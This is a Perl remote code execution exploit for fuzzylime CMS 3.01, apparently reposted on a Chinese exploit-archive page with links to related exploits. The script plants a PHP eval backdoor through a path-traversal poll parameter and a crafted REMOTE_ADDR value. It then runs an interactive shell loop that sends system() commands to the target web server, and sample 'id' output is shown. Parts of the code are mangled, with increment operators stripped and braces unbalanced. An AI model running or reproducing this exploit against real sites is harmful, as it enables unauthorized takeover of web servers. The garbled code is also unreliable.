fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

摘要：#!/usr/bin/perl#!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!...

#!/usr/bin/perl

#!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!

#after i noticed that there was a problem changing $cmd,i fixed it.this is the result.

## Fuzzylime 3.01 Remote Code Execution

## Credits: real and inphex

## [C:]# perl ye.pl host /path/

## :>id

## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)

use LWP::UserAgent;

use HTTP::Cookies;

use Switch;

$host_ = "http://".shift;

$path_ = shift;

$info{'info'} = {

"description" => ["#################################################nFuzzyLime Remote Code Executionn#################################################nreal & inphexn"],

"options" =>

{

"agent" => "",

"proxy" => "",

"default_headers" => [

["key","value"]],

"timeout" => 2,

"cookie" =>

{

"cookie" => [""],

"sending_options" =>

{

"host" => $host_,

"path" => $path_."code/polladd.php",

"port" => 80,

"method_a" => "REMOTE_CODE_EXECUTION",

"attack" =>

{

"poll" => ["get","poll","....//swear"],

"log" => ["get","log","1"],

"_SERVER[REMOTE_ADDR]" => ["get","_SERVER[REMOTE_ADDR]","";eval("$_POST[cmd]"); ?>"],

};

&start($info{'info'},222);

while () {

print ":>";

$cmd = <STDIN>;

chomp($cmd);

$info1{'info1'} = { "options" =>{"agent" => "", "proxy" => "", "default_headers" => [ ["key","value"]], "timeout" => 2, "cookie" => {"cookie" => [""],},},"sending_options" =>{"host" => $host_, "path" => $path_."code/polls/swear.inc.php", "port" => 80, "method_a" => "REMOTE_CODE_EXECUTION", "attack" =>{

"cmd" => ["post","cmd","system('".$cmd."');"],},},};

&start($info1{'info1'},221);

print ${$info1{'info1'}}{221}{'content'};

}

sub start

{

$a_ = shift;

$id = shift;

$post_dA = "";

$get_dA = get_d_p_s("get");

$post_dA = get_d_p_s("post");

my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);

$jj = 1;

$ii = 48;

$hh = 1;

$ppp = 0;

$s = shift;

$a = "";

$res_p = "";

$h = "";

$ua= "";

$agent= "";

$k= "";

$v= "";

$get_data= "";

$post_data= "";

$header_dA = "";

$h_host_h_xdsjaop = $a_->{'sending_options'}{'host'};

$h_path_h_xdsjaop = $a_->{'sending_options'}{'path'};

$h_port_h_xdsjaop = $a_->{'sending_options'}{'port'};

$method_m = $a_->{'sending_options'}{'method_a'};

$ua = LWP::UserAgent->new;

$ua->timeout($a_->{'options'}{'timeout'});

if ($a_->{'options'}{'proxy'}) {

$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});

}

$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";

$ua->agent($agent);

{

while (($k,$v) = each(%{$a_}))

{

if ($k ne "options" && $k ne "sending_options")

{

foreach $r (@{$a_->{$k}})

{

print $a_->{$k}[0];

}

foreach $j (@{$a_->{'options'}{'default_headers'}})

{

$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);

$m ;

}

if ($a_->{'options'}{'cookie'}{'cookie'}[0])

{

$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);

}

switch ($method_m)

{

case "attack" { &attack();}

case "SQL_INJECTION_BLIND" { &sql_injection_blind();}

case "REMOTE_COMMAND_EXECUTION" { &attack();}

case "REMOTE_CODE_EXECUTION" {&attack();}

case "REMOTE_FILE_INCLUSION" { &attack();}

case "LOCAL_FILE_INCLUSION" { &attack(); }

else { &attack(); }

}

sub attack

{

my ($jj);

my ($h);

my($x);

if ($post_dA eq "") {

$method = "get";

} elsif ($post_dA ne "")

{

$method = "post";

}

if ($method eq "get") {

$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);

${$a_}{$id}{'content'} = $res_p;

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])

{

if (${$jj} ne "")

{

${$a_}{$id}{'regex'}[$h][$x] = ${$jj};

$x ;

}

$jj ;

}

$h ;

}

} elsif ($method eq "post")

{

$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);

${$a_}{$id}{'content'} = $res_p;

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])

{

if (${$jj} ne "")

{

${$a_}{$id}{'regex'}[$h][$x] = ${$jj};

$x ;

}

$jj ;

}

$h ;

}

sub sql_injection_blind

{

while ()

{

while ($ii <= 120)

{

$itsx = "[".chr($ii)."]";

$l = length($itsx);

$b = ("b")x$l;

syswrite STDOUT,$b.$itsx;

if(check($ii,$hh) == 1)

{

syswrite STDOUT,$b.chr($ii)."---";

$hh ;

$chr = $chr.chr($ii);

}

$ii ;

}

push(@ffs,length($chr));

if (($#ffs - 999) == $ffs)

{

exit;

}

$ii = 48;

}

sub check($$)

{

my ($h);

my ($a);

$ii = shift;

$hh = shift;

if (get_d_p_s("post") ne "")

{

$method = "post";

} else { $method = "get";}

if ($method eq "get")

{

$ppp ;

$query = modify($get_dA,$ii,$hh);

$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)

{

if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {

return 1;

} else { return 0;}

}

else

{

if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {

return 0;

}else { return 1;}

}

$h ;

}

} elsif ($method eq "post")

{

$ppp ;

$query_g = modify($get_dA,$ii,$hh);

$query_p = modify($post_dA,$ii,$hh);

$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)

{

return 1;

}

else

{

return 0;

}

$h ;

}

sub modify($$$)

{

$string = shift;

$replace_by = shift;

$replace_by1 = shift;

if ($string !~/$i/ && $string !~/$h/) {

return $string;

} elsif ($string !~/$i/)

{

$ff = substr($string,0,index($string,"$h"));

$ee = substr($string,rindex($string,"$h") 2);

$string = $ff.$replace_by1.$ee;

return $string;

} elsif ($string !~/$h/)

{

$f = substr($string,0,index($string,"$i"));

$e = substr($string,rindex($string,"$i") 2);

$string = $f.$replace_by.$e;

return $string;

} else

{

$f = substr($string,0,index($string,"$i"));

$e = substr($string,rindex($string,"$i") 2);

$string = $f.$replace_by.$e;

$ff = substr($string,0,index($string,"$h"));

$ee = substr($string,rindex($string,"$h") 2);

$string = $ff.$replace_by1.$ee;

return $string;

}

sub get_d_p_s

{

$k = 0;

$v = 0;

$g_d_p_s = shift;

@post = ();

@get = ();

$post_data = "";

$get_data = "";

$header_data = "";

%header_dA = ();

$p = "";

$g = "";

while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))

{

if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/)

{

$p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";

} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) {

$g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";

} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")

{

$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];

}

if ($g_d_p_s eq "get")

{

return $g;

}

elsif ($g_d_p_s eq "post")

{

return $p;

} elsif ($g_d_p_s eq "header")

{

return %header_dA;

}

@a_ = ();

}

sub get_data

{

$h_host_h_xdsjaop = shift;

$h_path_h_xdsjaop = shift;

%hash = get_d_p_s("header");

while (($u,$c) = each(%hash))

{

$ua->default_headers->push_header($u => $c);

}

$req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);

return $req->content;

}

sub post_data

{

$h_host_h_xdsjaop = shift;

$h_path_h_xdsjaop = shift;

$content_type = shift;

$send = shift;

%hash = get_d_p_s("header");

while (($u,$c) = each(%hash))

{

$ua->default_headers->push_header($u => $c);

}

$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);

$req->content_type($content_type);

$req->content($send);

$res = $ua->request($req);

return $res->content;

}

【fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)】相关文章：

★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

★ TGS CMS 0.3.2r2 Remote Code Execution Exploit

★ fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

★ minb 0.1.0 Remote Code Execution Exploit

★ ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

★ fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

★ CodeDB (list.php lang) Local File Inclusion Vulnerability

★ moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)

上一篇： WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

下一篇： fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

学习工具